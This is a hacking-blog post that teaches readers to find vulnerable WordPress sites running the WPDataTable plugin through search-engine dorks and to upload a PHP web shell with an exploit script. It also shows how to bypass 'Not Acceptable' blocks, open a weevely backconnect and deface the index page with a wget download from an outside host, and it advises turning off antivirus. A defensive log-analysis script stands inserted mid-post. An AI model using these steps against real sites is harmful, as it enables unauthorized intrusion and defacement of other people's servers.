Wordpress Working Exploit: WPDataTable Shell Upload Vulnerability and Not Acceptable Bypass
Welcome to HackingHost, a blog which shares selected posts from the whole internet with you. As we know, WordPress is the most popular CMS for website and blog creation. About 75% of websites on the internet are powered by WordPress. Recently our hacker friends discovered a vulnerability in a WordPress plugin called WPDataTable, which allows us to upload a shell to the website server and hack it.
A shell is a PHP script which is used by hackers to gain access to a website server and do various tasks like defacing, rooting, etc. You can download a shell from our website. Some shell names are c99, etc. Shells are detected as viruses by antivirus software, so turn off your antivirus before downloading.
Let's get back to the topic.
Uploading The Shell
Requirements:
- Python (version 2.7).
- Exploit script (press Ctrl+S to save).
- Shell (e.g. c99).
Steps:
1: Create a new folder and copy the exploit and the shell to it.
2: Rename the exploit script to a Python executable.
Before:
wpdatatables_shell_up.py_.txt
To:
wpdatatables_shell_up.py_.py
3: Now let's find a website which can be hacked.
We are going to use a search engine for this, like Google.
Just search using any of these:
inurl:/plugins/wpdatatables
inurl:codecanyon-3958969
index of "wpdatatables"
index of "codecanyon-3958969"
You will get many website results; we will test them one by one. All websites that are using an older version of the plugin are hackable.
4: Open Command Prompt/Terminal.
Windows users can press Start+R to open Run and then type cmd to start Command Prompt.
Type cd followed by your folder location in cmd, e.g.:
cd c:/hack
Then type:
python wpdatatables_shell_up.py -t targetsite.com -f shell.php
where targetsite.com is the address of your target website and shell.php is the name of the shell we are going to upload, e.g. c99.php.
If the shell is uploaded successfully you will get the shell URL. If not, try another site. I got a working site after 3 Google pages.
If the shell is not accessible, change the shell name from shell.php to shell.phpxxx.
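From the site owner's side, the upload and the shell.phpxxx rename described above leave a trace in the web server's access log. The following is an added example, not part of the original post or of the exploit script: it flags requests for files with a PHP-like extension inside an upload directory. The combined log format, the /wp-content/uploads/ location and the sample log lines are assumptions constructed for illustration.

```python
import re
from collections import defaultdict

# Assumption: Apache/Nginx "combined" access-log format.
LOG_RE = re.compile(r'(?P<ip>\S+) \S+ \S+ \[[^\]]+\] '
                    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3})\b')
# Extensions beginning with "php" (php, php5, phpxxx, ...) plus phtml.
PHP_LIKE = re.compile(r'\.(?:php\w*|phtml)$', re.IGNORECASE)
# Assumption: upload directory where no script should ever be requested.
WATCHED_DIRS = ("/wp-content/uploads/",)

# Constructed sample log lines (documentation IP range, made-up paths).
SAMPLE_LOG = [
    '203.0.113.7 - - [10/Oct/2014:13:55:36 +0000] "GET /wp-content/uploads/2014/10/photo.jpg HTTP/1.1" 200 5120 "-" "Mozilla/5.0"',
    '203.0.113.9 - - [10/Oct/2014:13:56:01 +0000] "GET /wp-content/uploads/shell.php HTTP/1.1" 406 226 "-" "curl/7.30"',
    '203.0.113.9 - - [10/Oct/2014:13:57:12 +0000] "GET /wp-content/uploads/shell.phpxxx?x=1 HTTP/1.1" 200 812 "-" "curl/7.30"',
    '203.0.113.7 - - [10/Oct/2014:13:58:40 +0000] "GET /index.php HTTP/1.1" 200 9042 "-" "Mozilla/5.0"',
]


def find_suspect_requests(lines, watched_dirs=WATCHED_DIRS):
    """Map each PHP-like path under a watched dir to its (ip, method, status) requests."""
    hits = defaultdict(list)
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # skip lines that are not in the expected format
        path = m.group("path").split("?", 1)[0]  # ignore the query string
        in_watched = any(d in path.lower() for d in watched_dirs)
        if in_watched and PHP_LIKE.search(path):
            hits[path].append((m.group("ip"), m.group("method"), int(m.group("status"))))
    return dict(hits)


def classify(hits):
    """'served' if any 2xx answer was given, 'blocked' if only 403/404/406, else 'review'."""
    verdicts = {}
    for path, reqs in hits.items():
        statuses = {status for _, _, status in reqs}
        if any(200 <= s < 300 for s in statuses):
            verdicts[path] = "served"   # file was delivered or executed: investigate the host
        elif statuses <= {403, 404, 406}:
            verdicts[path] = "blocked"  # denied, missing, or rejected as Not Acceptable
        else:
            verdicts[path] = "review"
    return verdicts


if __name__ == "__main__":
    for path, verdict in classify(find_suspect_requests(SAMPLE_LOG)).items():
        print(verdict, path)
```

A "served" verdict on a renamed extension means the server still treats that extension as executable or deliverable from the upload directory, so the fix belongs in the handler configuration as well as in updating the plugin.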
Bypassing Not Acceptable
Requirements:
1- Weevely Stealth Shell
2- Remote Deface Script (.txt)
Steps:
1- Upload weevely stealth shell using the exploit script
2- Backconnect using weevely
3- CD to root directory
4- Backup index.php
mv index.php indexBAK.php
5- Import Deface Script
wget http://yourhosting.com/index.txt -O index.php
Exploit credits: homelab.it
Uploading Shell
Nice brother, it's working. After spending some time I found some hackable websites. Shell uploaded successfully but on some servers I can't access it. It shows an error that I have no permissions to access it. Please help.
good work..!!!
Thanks for sharing with us...!!!!!!